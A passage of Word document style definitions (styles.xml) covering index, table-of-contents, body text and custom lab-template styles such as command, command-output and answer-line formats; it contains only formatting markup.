      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="1440" w:hanging="240"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index7">
    <w:name w:val="index 7"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="1680" w:hanging="240"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index8">
    <w:name w:val="index 8"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="1920" w:hanging="240"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index9">
    <w:name w:val="index 9"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="2160" w:hanging="240"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="240"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="480"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC4">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC5">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="960"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC6">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="1200"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC7">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="1440"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC8">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="1680"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC9">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="1920"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="FootnoteText">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FootnoteTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUse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Pr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>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sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IndexHeading">
    <w:name w:val="index heading"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TableofFigures">
    <w:name w:val="table of figures"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="480" w:hanging="480"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="EndnoteText">
    <w:name w:val="endnote text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="EndnoteTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="EndnoteTextChar">
    <w:name w:val="Endnote Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="EndnoteText"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TableofAuthorities">
    <w:name w:val="table of authorities"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="240" w:hanging="240"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="MacroText">
    <w:name w:val="macro"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="MacroTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:before="0"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hint="default"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOAHeading">
    <w:name w:val="toa heading"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="0" w:after="120" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TitleChar">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="msotitlecxsplast"/>
    <w:uiPriority w:val="10"/>
    <w:rPr>
      <w:rFonts w:ascii="SimSun" w:eastAsia="SimSun" w:hAnsi="SimSun" w:hint="eastAsia"/>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="msotitlecxspfirst">
    <w:name w:val="msotitlecxspfirst"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="msotitlecxspmiddle">
    <w:name w:val="msotitlecxspmiddle"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="msotitlecxsplast">
    <w:name w:val="msotitlecxsplast"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="120" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextChar">
    <w:name w:val="Body Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyText"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="DocumentMap">
    <w:name w:val="Document Map"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="DocumentMapChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUse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hint="default"/>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DefaultParagraphFont"/>
    <w:link w:val="CommentSubject"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>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Revision">
    <w:name w:val="Revision"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="0" w:after="200"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="msolistparagraphcxspfirst">
    <w:name w:val="msolistparagraphcxspfirst"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="msolistparagraphcxspmiddle">
    <w:name w:val="msolistparagraphcxspmiddle"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="msolistparagraphcxsplast">
    <w:name w:val="msolistparagraphcxsplast"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="200"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ClientNote">
    <w:name w:val="Client Note"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="FF0000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="AnswerLineL25">
    <w:name w:val="Answer Line L25"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="360"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="FFFFFF"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="PageHead">
    <w:name w:val="Page Head"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="AnswerLineL50">
    <w:name w:val="Answer Line L50"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="FFFFFF"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TableTextChar">
    <w:name w:val="Table Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="TableText"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableText">
    <w:name w:val="Table Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="TableTextChar"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableHeading">
    <w:name w:val="Table Heading"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="120" w:after="120"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Bulletlevel1">
    <w:name w:val="Bullet level 1"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="720" w:hanging="360"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Bulletlevel2">
    <w:name w:val="Bullet level 2"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="1080" w:hanging="360"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="InstNoteRed">
    <w:name w:val="Inst Note Red"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="EE0000"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ConfigWindow">
    <w:name w:val="Config Window"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="FFFFFF"/>
      <w:sz w:val="6"/>
      <w:szCs w:val="6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="SubStepAlpha">
    <w:name w:val="SubStep Alpha"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="720" w:hanging="360"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CMDChar">
    <w:name w:val="CMD Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="CMD"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CMD">
    <w:name w:val="CMD"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CMDChar"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextL50Char">
    <w:name w:val="Body Text L50 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyTextL50"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="BodyTextL50">
    <w:name w:val="Body Text L50"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextL50Char"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextL25Char">
    <w:name w:val="Body Text L25 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyTextL25"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="BodyTextL25">
    <w:name w:val="Body Text L25"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextL25Char"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="360"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="InstNoteRedL50">
    <w:name w:val="Inst Note Red L50"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="EE0000"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="DevConfigsChar">
    <w:name w:val="DevConfigs Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="DevConfigs"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="DevConfigs">
    <w:name w:val="DevConfigs"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="DevConfigsChar"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Visual">
    <w:name w:val="Visual"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="240"/>
      <w:jc w:val="center"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="SubStepNum">
    <w:name w:val="SubStep Num"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="1080" w:hanging="360"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CMDOutputChar">
    <w:name w:val="CMD Output Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="CMDOutput"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CMDOutput">
    <w:name w:val="CMD Output"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CMDOutputChar"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="InstNoteRedL25">
    <w:name w:val="Inst Note Red L25"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="360"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="EE0000"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="BodyTextL25Bold">
    <w:name w:val="Body Text L25 Bold"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="360"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ReflectionQ">
    <w:name w:val="Reflection Q"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="360" w:hanging="360"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ColorfulShading-Accent11">
    <w:name w:val="Colorful Shading - Accent 11"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextBoldChar">
    <w:name w:val="Body Text Bold Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyTextBold"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="BodyTextBold">
    <w:name w:val="Body Text Bold"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextBoldChar"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CMDRedChar">
    <w:name w:val="CMD Red Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="CMDRed"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      <w:color w:val="EE0000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CMDRed">
    <w:name w:val="CMD Red"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CMDRedChar"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:color w:val="EE0000"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CMDOutputRedChar">
    <w:name w:val="CMD Output Red Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="CMDOutputRed"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      <w:color w:val="EE0000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CMDOutputRed">
    <w:name w:val="CMD Output Red"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CMDOutputRedChar"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:color w:val="EE0000"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Drawing">
    <w:name w:val="Drawing"/>
